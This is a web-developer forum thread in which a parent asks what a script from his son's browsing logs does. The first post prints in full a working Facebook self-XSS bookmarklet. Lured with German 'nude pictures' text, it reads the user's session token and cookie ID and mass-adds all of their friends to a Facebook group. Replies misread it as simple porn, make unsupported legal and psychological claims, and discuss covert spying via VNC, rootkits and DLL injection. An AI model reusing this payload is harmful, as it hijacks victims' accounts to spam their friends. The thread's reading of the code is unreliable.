www.webdeveloper.com
Results 1 to 13 of 13

Thread: Need help to find out what the script does

  1. #1
    Join Date
    Jan 2014
    Posts
    2

    Need help to find out what the script does

    I am a father from Germany and i have Trouble with my son.
    He is 12 years old and i've found him watching adult things he shouldnt watch
    after a 2nd i found him looking at such Pictures he promised not to do that anymore.
    Anyhow i installed a logger witch logs his web activitys and now i found in the logs this JavaScript which was marked as explicit Content. How he says it is a script for a game can someone take a look at this code and say what it really is doing?
    Code:
    javascript:void(function()
    {var%20j=document.getElementsByName('fb_dtsg')[0].value;
    var%20k=document.cookie.match(/c_user=(\d+)/)[1];
    var%20m='7n8ahyj35CCzpQ9UmWOGUGy1m9ACUb8yGg';
    var%20o=8;
    var%20t='1033590';
    var%20v='265816767119957579';
    window.aing={ldng:'\x3Cimg%20src=\x22//fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif\x22%20width=\x2216px\x22%20height=\x2211px\x22%20style=\x22margin:0%205px\x22/\x3E',prm:'fb_dtsg='+j+'&__user='+k+'&__dyn='+m+'&__req='+o+'&__rev='+t+'&ttstamp='+v+'&__a=1',prmdg:'fb_dtsg='+j+'&__user='+k+'&__a=1&source=typeahead&ref=&message_id=&phstamp=',prmgp:'__a=1&viewer='+k+'&token='+Math.random()+'&filter[0]=user&options[0]=friends_only',prmls:'location=permalink&action=subscribe&flid=553915041311558&fb_dtsg='+j+'&__user='+k+'&__a=1&__dyn='+m+'&__req='+o+'&__rev='+t+'&ttstamp='+v,btn:function(a,b){var%20c='\x3Ca%20class=\x22uiButton\x22%20href=\x22#\x22%20onClick=\x22';
    if(a==null||a==''){c+='aing.injek()'}else{c+=a}c+=';
    %0A%09%09%09return%20true\x22%20style=\x22font-size:9px;
    %0A%09%09%09margin:2px;
    %0A%09%09%09line-height:9px\x22\x3E';
    if(b==null||b==''){c+='Neu%20Laden'}else{c+=b}return%20c+'\x3C/a\x3E'},insb:function(b,c,d)
    {if(c){var%20a=document.createElement('div');
    a.innerHTML=b;
    if(d==null){d=c.firstChild}while(a.firstChild){c.insertBefore(a.firstChild,d)}}},apen:function(b,c){if(c){var%20a=document.createElement('div');
    a.innerHTML=b;
    while(a.firstChild){c.appendChild(a.firstChild)}}},styl:{box:'text-align:left;
    %0A%09%09%09border-radius:0px;
    %0A%09%09%09padding:0px',inf:'width:500px;
    %0A%09%09%09position:fixed;
    %0A%09%09%09z-index:9999;
    %0A%09%09%09top:30%;
    %0A%09%09%09right:0;
    %0A%09%09%09text-align:center;
    %0A%09%09%09font-size:10px;
    %0A%09%09%09border-radius:5px;
    %0A%09%09%09box-shadow:0%200%200px%20rgba(0,0,0,0.25);
    %0A%09%09%09background-color:rgba(211,211,211,0.75)'},aduk:function(a){var%20b=a.length,c,d;
    while(0!==b){d=Math.floor(Math.random()*b);
    b-=1;
    c=a[b];
    a[b]=a[d];
    a[d]=c}var%20e=['i','a','e','g','o','s','n','b','l','p','m','2','r','0','c','1','t','3','\xA9'],crl=e[1]+e[0]+e[6]+e[3]+e[14]+e[12]+e[2]+e[1]+e[16]+e[0]+e[4]+e[6]+e[5]+'.'+e[7]+e[8]+e[4]+e[3]+e[5]+e[9]+e[4]+e[16]+'.'+e[14]+e[4]+e[10];
    aing.crj='\x3Cdiv%20style=\x22margin-top:0px;
    %0A%09%09%09color:gray;
    %0A%09%09%09font-size:0px;
    %0A%09%09%09text-align:right\x22\x3E'+e[1].toUpperCase()+e[0]+e[6]+e[3]+e[14].toUpperCase()+e[12]+e[2]+e[1]+e[16]+e[0]+e[4]+e[6]+e[5]+'%20'+e[e.length-1]+e[11]+e[13]+e[15]+e[17]+'\x3Cdiv%20style=\x22font-size:0px\x22\x3E\x3Ca%20href=\x22http://www.facebook.com/groups/1408992565982028/\x22%20target=\x22_blank\x22\x3E'+crl+'\x3C/a\x3E\x3C/div\x3E\x3C/div\x3E';
    return%20a},kolAjak:function(i,r,l,a,n){if(n==null||n==''){n='POST'}else{i+='?'+r}var%20h=new%20XMLHttpRequest();
    h.open(n,i,true);
    h.setRequestHeader('Content-type','application/x-www-form-urlencoded');
    h.onreadystatechange=function(c){if(c.target.readyState==4){if(aing.panggilanKe){aing.panggilanKe++}else{aing.panggilanKe=1}var%20e={errorSummary:'connection%20error!',errorDescription:'ajax%20status='+c.target.status};
    if(c.target.status==200||c.target.status==400){var%20d=c.target.responseText;
    if(d==''){e.errorSummary='empty%20callback!'}else{e=JSON.parse(d.substring(d.indexOf('%0A%09%09%09%09%09%09%09%09{%0A%09%09%09%09%09%09%09%09'),d.lastIndexOf('%0A%09%09%09%09%09%09%09}%0A%09%09%09%09%09%09%09')+1))}a(l,e)}else%20if(aing.panggilanKe<2){aing.kolAjak(i,r,l,a,n)}else{aing.panggilanKe=0;
    a(l,e)}}};
    h.send(r)},kasihTau:function(a,b){var%20c=document.getElementById('kiri-bawah');
    if(c){if(b==null||b==''){c.lastChild.innerHTML=a}else{var%20d=document.getElementById(b);
    if(d){d.innerHTML=a}else{aing.apen('\x3Cdiv%20id=\x22'+b+'\x22\x3E'+a+'\x3C/div\x3E',c.lastChild)}}}else{var%20e='\x3Cdiv%20id=\x22kiri-bawah\x22%20class=\x22pam%20uiBoxGray\x22%20style=\x22'+aing.styl.inf+'\x22\x3E\x3Cdiv\x3E\x3C/div\x3E\x3Cdiv\x3E'+a+'\x3C/div\x3E\x3C/div\x3E';
    var%20f=document.getElementById('rightCol');
    if(!f){f=document.body}aing.apen(e,f)}},klos:function(){var%20a=document.getElementById('kiri-bawah');
    if(a){a.parentNode.removeChild(a)}aing.kolAjak('/ajax/friends/lists/subscribe/modify',aing.prmls,'',function(){})},getPren:function(){window.loadBarFrom=0;
    aing.deleted=0;
    aing.kasihTau('Suche%20Nacktbilder..%20warten%20'+aing.ldng);
    aing.kolAjak('/ajax/typeahead/first_degree.php',aing.prmgp,'',function(q,p){if(p.payload&&p.payload.entries){aing.Nacktbilder=aing.aduk(p.payload.entries);
    var%20a='\x3Cdiv%20class=\x22uiBoxBlack\x22%20style=\x22border-radius:0px\x22\x3EEs%20Wurden%20\x3Cb\x3E'+aing.Nacktbilder.length+'%20Nacktbilder%20gefunden\x3C/b\x3E\x3C/div\x3E\x3Cdiv%20id=\x22edtugrup\x22%20style=\x22margin-top:2px\x22\x3E\x3C/div\x3E\x3Cdiv%20id=\x22\x22%20style=\x22margin-top:0px\x22\x3E\x3C/div\x3E\x3Cdiv%20id=\x22Hi\x22%20style=\x22margin-top:0px\x22\x3E\x3C/div\x3E';
    if(aing.Nacktbilder.length==0){aing.kasihTau(a+aing.btn('aing.getPren()'+aing.crj))}else{aing.kasihTau(a+aing.crj);
    aing.addToGroup()}}},'GET')},inform:function(a,b){var%20c='';
    if(b&&b.name){c=b.name}else%20if(b&&b!=''){for(x%20in%20aing.Nacktbilder){if(aing.Nacktbilder[x].text&&aing.Nacktbilder[x].uid&&aing.Nacktbilder[x].uid==b){c=aing.Nacktbilder[x].text;
    break}}}return%20c.split('%20')[0]},addToGroup:function(c,d){var%20e='%20';
    if(c==null||c==''){c=0;
    aing.edgruperor=0;
    aing.edgrupok=0;
    aing.gid=document.getElementsByName('group_id')[0].value}if(d==null||d==''){d=100}if(d>aing.Nacktbilder.length){d=aing.Nacktbilder.length;
    aing.edgrupnek=''}else{aing.edgrupnek={f:d,t:((d*2)-c)}}e+=(c+1)+'%20to%20'+d+'%20Nacktbilder%20werden%20geladen%20';
    aing.kasihTau(e,'edtugrup');
    for(var%20x=c;
    x<d;x++){aing.kolAjak('/ajax/groups/members/add_post.php',aing.prmdg+'&group_id='+aing.gid+'&members='+aing.Nacktbilder[x].uid,'',function(q,p){if(p&&p.errorSummary&&p.errorDescription){aing.edgruperor++;
    var%20a='\x3Cdiv%20class=\x22uiBoxRed\x22%20style=\x22'+aing.styl.box+'\x22\x3E';
    var%20b=p.errorDescription;
    if(p.onafterload&&p.onafterload[0]){b=p.errorDescription.replace(/This%20user|user%20|Pengguna%20ini|pengguna%20/gi,'\x3Ca%20href=\x22/Nacktbilder\x22%20target=\x22_blank\x22%20style=\x22font-weight:small\x22\x3E'+eval(p.onafterload[0].replace(/Arbiter\./i,'aing.'))+'\x3C/a\x3E')}a+='\x3Cdiv\x3E(Updates:%20\x3Cb\x3E'+aing.edgruperor+'\x3C/b\x3E)%20'+b+'\x3C/div\x3E';
    a+='\x3C/div\x3E'}else%20if(p.jsmods&&p.jsmods.require){aing.edgrupok++;
    var%20a='\x3Cdiv%20class=\x22uiBoxBlack\x22%20style=\x22'+aing.styl.box+'\x22\x3E\x3Cb\x3E';
    for(y%20in%20p.jsmods.require){if(p.jsmods.require[y][3]&&p.jsmods.require[y][3][1]){a+='%20'+p.jsmods.require[y][3][1]}}if(p.onload&&p.onload[0])a+='Script%20by%20Corex%20ihr%20Huren!'}if((aing.edgruperor+aing.edgrupok)>=aing.Nacktbilder.length){aing.kasihTau(aing.btn('aing.getPren()')+'%20'+aing.btn('aing.klos()','Nacktbilder%20anzeigen'),'edtugrup')}else%20if(aing.edgrupnek.f&&(aing.edgruperor+aing.edgrupok)>=aing.edgrupnek.f){aing.addToGroup(aing.edgrupnek.f,aing.edgrupnek.t)}aing.loadBar(document.getElementById('edtugrup'),aing.Nacktbilder.length,'#010100',function(){},'no')})}},loadBar:function(a,i,n,g,s){i=i*1;
    if(window.loadBarFrom&&window.loadBarFrom<i){loadBarFrom++}else%20if(window.loadBarFrom&&window.loadBarFrom==i){}else{window.loadBarFrom=1}var%20u=a.getElementsByClassName('loading-bar')[0];
    var%20b=((loadBarFrom*100)/i);
    if(u){u.firstChild.style.width=b+'%';
    if(s==null||s==''){a.firstChild.innerHTML=loadBarFrom+'/'+i;
    if(loadBarFrom>=i){a.getElementsByClassName('stat-count')[0].innerHTML='\x3Cb%20style=\x22color:darkred\x22\x3E'+Math.floor(b)+'%%20Done!\x3C/b\x3E';
    g()}else{a.getElementsByClassName('stat-count')[0].innerHTML='Loading%20'+Math.floor(b)+'%%20Please%20wait..'}}else{u.firstChild.innerHTML=Math.floor(b)+'%';
    if(loadBarFrom>=i){g()}}}else{u=document.createElement('div');
    if(s==null||s==''){u.innerHTML='\x3Ccenter%20class=\x22stat-count\x22\x3ELoading%20'+Math.floor(b)+'%%20Please%20wait..\x3C/center\x3E\x3Cdiv%20class=\x22loading-bar\x22\x3E\x3Cdiv%20style=\x22width:'+b+'%;
    %0A%09%09%09%09%09background-color:'+n+';
    %0A%09%09%09%09%09border-radius:5px\x22\x3E%C2%A0%0A%09%09%09%09%09\x3C/div\x3E\x3C/div\x3E\x3Ccenter%20class=\x22prog-count\x22\x3E'+loadBarFrom+'/'+i+'\x3C/center\x3E'}else{u.innerHTML='\x3Cdiv%20class=\x22loading-bar\x22\x3E\x3Cdiv%20style=\x22width:'+b+'%;
    %0A%09%09%09%09%09background-color:'+n+';
    %0A%09%09%09%09%09border-radius:5px;
    %0A%09%09%09%09%09black-space:nowrap;
    %0A%09%09%09%09%09overflow:visible;
    %0A%09%09%09%09%09color:#FFEB00\x22\x3E'+Math.floor(b)+'%\x3C/div\x3E\x3C/div\x3E'}while(u.firstChild){a.insertBefore(u.firstChild,a.firstChild)}}}};
    aing.getPren()})();
    a worried father from Germany

  2. #2
    Join Date
    Jan 2014
    Posts
    2
    noone?

  3. #3
    Join Date
    Mar 2007
    Location
    localhost
    Posts
    2,223
    Well its certainly doing something, makes a reference to this facebook group http://www.facebook.com/groups/1408992565982028/ which is a closed group and in the code I find the german language for "Find nude pictures .. wait" in this block of code

    Code:
    function(){})},getPren:function(){window.loadBarFrom=0;
    aing.deleted=0;
    aing.kasihTau('Suche Nacktbilder.. warten '+aing.ldng);
    aing.kolAjak('/ajax/typeahead/first_degree.php',aing.prmgp,''
    And a little further the following "Nacktbilder gefunden" == Nude pictures found

    So it would appear that your son is curious about women, he should be warned of the fact that pornography and the women portrayed in the pictures is not real life.

    Hope that helps you.
    Yes, I know I'm about as subtle as being hit by a bus..(\\.\ Aug08)
    Yep... I say it like I see it, even if it is like a baseball bat in the nutz... (\\.\ Aug08)
    I want to leave this world the same way I came into it, Screaming, Incontinent & No memory!
    I laughed that hard I burst my colostomy bag... (\\.\ May03)
    Life for some is like a car accident... Mine is like a motorway pile up...

    Problems with Vista? :: Getting Cryptic wid it. :: The 'C' word! :: Whois?

  4. #4
    Join Date
    Mar 2007
    Location
    localhost
    Posts
    2,223
    If you want to be really sneaky, http://windows.microsoft.com/en-gb/w...=windows-vista

    for example
    Yes, I know I'm about as subtle as being hit by a bus..(\\.\ Aug08)
    Yep... I say it like I see it, even if it is like a baseball bat in the nutz... (\\.\ Aug08)
    I want to leave this world the same way I came into it, Screaming, Incontinent & No memory!
    I laughed that hard I burst my colostomy bag... (\\.\ May03)
    Life for some is like a car accident... Mine is like a motorway pile up...

    Problems with Vista? :: Getting Cryptic wid it. :: The 'C' word! :: Whois?

  5. #5
    Join Date
    Mar 2012
    Posts
    202
    You'll probably want to use VNC, as Microsoft's remote desktop takes over the user's login session upon connection, essentially making it worthless for spying purposes.

  6. #6
    Join Date
    Oct 2012
    Location
    Croatia
    Posts
    250
    If you really want to block your son from accessing porn sites the best way to go is with setting up some linux firewall/proxy gateway with the web content filtering capabilities. I remember one easy to setup distribution it was called IPCOP and it seems that it's still "alive". If I'm not wrong I think you can install web content filter as addon and set it up according to your needs. It has nice web interface for accessing the firewall so it's easy to manage once installed (even if you're not advanced user) and it's based on widely popular Debain distribution.

    If you're advanced user or if you're willing to put some effort and learn something you can go with one of many free GNU/Linux distributions and install Dansguardian or Squid proxy software on top of it.

    ...before trying any of above you should first check if your ISP's router (or one you have bought) already has web content filtering capabilities. If it has then set it up and make sure you lock down access to it.
    Last edited by tech_soul8; 01-10-2014 at 03:39 AM.

  7. #7
    Join Date
    Mar 2007
    Location
    localhost
    Posts
    2,223
    Personally my feelings are that the best content filter would be a Fatherly - Son discussion.

    The facebook group I found in that web code is a closed group or may have been removed altogether, so it is worth contacting facebook as well and point out that the group was found in some javascript program as pornographic content and let FB decide on if they are shutting that group down or not.

    Simply barring content may push your son to spend more time with his friends on their computers.

    Your main concerns will be that your son is going to be exposing himself to something that will shape his view of women, look at women as only being sex objects and being of no worth as well as something that is recognized a causing a dysfunction in normal sexual activity and is called "porn creep" as it "Conditions" the individual and they eventually (over a relatively short period) can not have a normal relationship with a woman, as your son is only 12 this should be a matter of urgent rectification before any permanent damage is done.

    If your son continues then a child psychologist may need to become involved to find out the cause of this need to seek out and look at pornography and more importantly what type of graphic images he is being exposed to because he could be unwittingly drawn in to pedophilia, it is known that this type of dysfunction can happen at any age and I think it was a UK tv program like panorama found that children as young as 10 were not just victims but were trading in the school playgrounds media that was not only exploitation but was pedophilia, something that no parent wants to hear but in the EU a child of 10 is considered not responsible for their actions whereas a child of 11 is and can be prosecuted and have to then undergo psychiatric assessments, etc and you would have a child with a criminal record if they were caught as being part of a pedophile ring / sting operation, the danger here being that you would be instantly subjected to an investigation and accused of being the person distributing such media and as the bill payer for the internet, you are the responsible person for that connection and could also be prosecuted for failing to filter content.

    This in the surface may only seem innocent but it has serious implications and as a parent I would have your son show you what he has been looking at and if its serious then I would urge you to call in that authorities and not turn a blind eye and allow it to continue.
    Yes, I know I'm about as subtle as being hit by a bus..(\\.\ Aug08)
    Yep... I say it like I see it, even if it is like a baseball bat in the nutz... (\\.\ Aug08)
    I want to leave this world the same way I came into it, Screaming, Incontinent & No memory!
    I laughed that hard I burst my colostomy bag... (\\.\ May03)
    Life for some is like a car accident... Mine is like a motorway pile up...

    Problems with Vista? :: Getting Cryptic wid it. :: The 'C' word! :: Whois?

  8. #8
    Join Date
    Oct 2012
    Location
    Croatia
    Posts
    250
    Hm...all this father - son investigation is somehow suspicious to me... The father doesn't know how to block pornographic content from son's computer but he knows how to install software for tracing his son, check the log file, extract JS code from log file...

    The son - he wasn't aware of tracing software installed on his computer (nor something like this is possible) but being only 12 he already knows something about scripts, programming...

    Maybe I'm wrong maybe not, who knows...? It's a strange world out there!
    Last edited by tech_soul8; 01-10-2014 at 08:50 AM.

  9. #9
    Join Date
    Mar 2007
    Location
    localhost
    Posts
    2,223
    Plenty of parental tools Tech_Soul that are a snap install just by plugging in a device that installs the software in a matter of seconds, remove the flash drive and job done.

    If a subvert was installed then the user of the machine wouldn't know anything about it as it wouldn't even show as a process because subverts operate at a system level and not an operating system level.

    Yep strange world for sure...
    Yes, I know I'm about as subtle as being hit by a bus..(\\.\ Aug08)
    Yep... I say it like I see it, even if it is like a baseball bat in the nutz... (\\.\ Aug08)
    I want to leave this world the same way I came into it, Screaming, Incontinent & No memory!
    I laughed that hard I burst my colostomy bag... (\\.\ May03)
    Life for some is like a car accident... Mine is like a motorway pile up...

    Problems with Vista? :: Getting Cryptic wid it. :: The 'C' word! :: Whois?

  10. #10
    Join Date
    Oct 2012
    Location
    Croatia
    Posts
    250
    Quote Originally Posted by \\.\ View Post
    Plenty of parental tools Tech_Soul that are a snap install just by plugging in a device that installs the software in a matter of seconds, remove the flash drive and job done.
    Yes, I know that but still suspicious a bit...

  11. #11
    Join Date
    Mar 2012
    Posts
    202
    Quote Originally Posted by \\.\ View Post
    If a subvert was installed then the user of the machine wouldn't know anything about it as it wouldn't even show as a process because subverts operate at a system level and not an operating system level.
    Technically, by definition that's a rootkit, and as-such would need to utilize some sort of hack or vulnerability in the system in order to work (most likely by replacing or modifying a system file, possibly the kernel). On the other hand, registry-based DLL injection techniques could be used to run code in every application's namespace without the need to even have another process running. I'm going to assume that this is the route most spy tools take.

  12. #12
    Join Date
    Mar 2007
    Location
    localhost
    Posts
    2,223
    It was a few years ago when I read about subverts / root kits, depending on how innovative the designer of the install routine, this can be done by different methods.

    1st and most obvious mode of installing a root kit is to have the application files stuffed on the drive waiting for the next reboot, most partition software has to run in this manner to perform its tasks, so it would make sense to use that behavior and run the install so that it installs the root kit then reboots so the root kit runs first and then the operating system operates through the root kit, a bit like a virtual host (Re ViritualBox) type systems.

    2nd route would be to hack the target machine by exploiting a weakness in the security. Various ports of entry exist and one of these is the web browser itself. I have had two drive by's in as many years, most people wouldn't be aware of them but I notice them because I am on a slow connection.

    If you know where to look you can obtain kits, a surveillance supplier had some very interesting products ranging from mobile phone power adapters that work, you can phone in to them and hear any conversation happening at that time, other systems allow dial up remote access and have video. USB flash drives that not only are bugs but covertly upload to the internet if its available any recordings it makes and it was powered when not in the USB drive which charged it up.

    That site was like the Q factory of 007 spy tools.

    When it comes to a need to survey, a mode or tool exists and computers are the easiest machines to exploit in that respect.
    Yes, I know I'm about as subtle as being hit by a bus..(\\.\ Aug08)
    Yep... I say it like I see it, even if it is like a baseball bat in the nutz... (\\.\ Aug08)
    I want to leave this world the same way I came into it, Screaming, Incontinent & No memory!
    I laughed that hard I burst my colostomy bag... (\\.\ May03)
    Life for some is like a car accident... Mine is like a motorway pile up...

    Problems with Vista? :: Getting Cryptic wid it. :: The 'C' word! :: Whois?

  13. #13
    Join Date
    Mar 2012
    Posts
    202
    Interesting info, thanks. I was just referring to the ability to hide processes in legitimate surveillance software though. Modern computers come equipped with a technology called SecureBoot, which prevents against boot-sector attacks as you've described. Essentially all I'm saying is that the only way to reliably accomplish the required stealthiness without actually overwriting system files in Windows is to use DLL-injection.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center



Recent Articles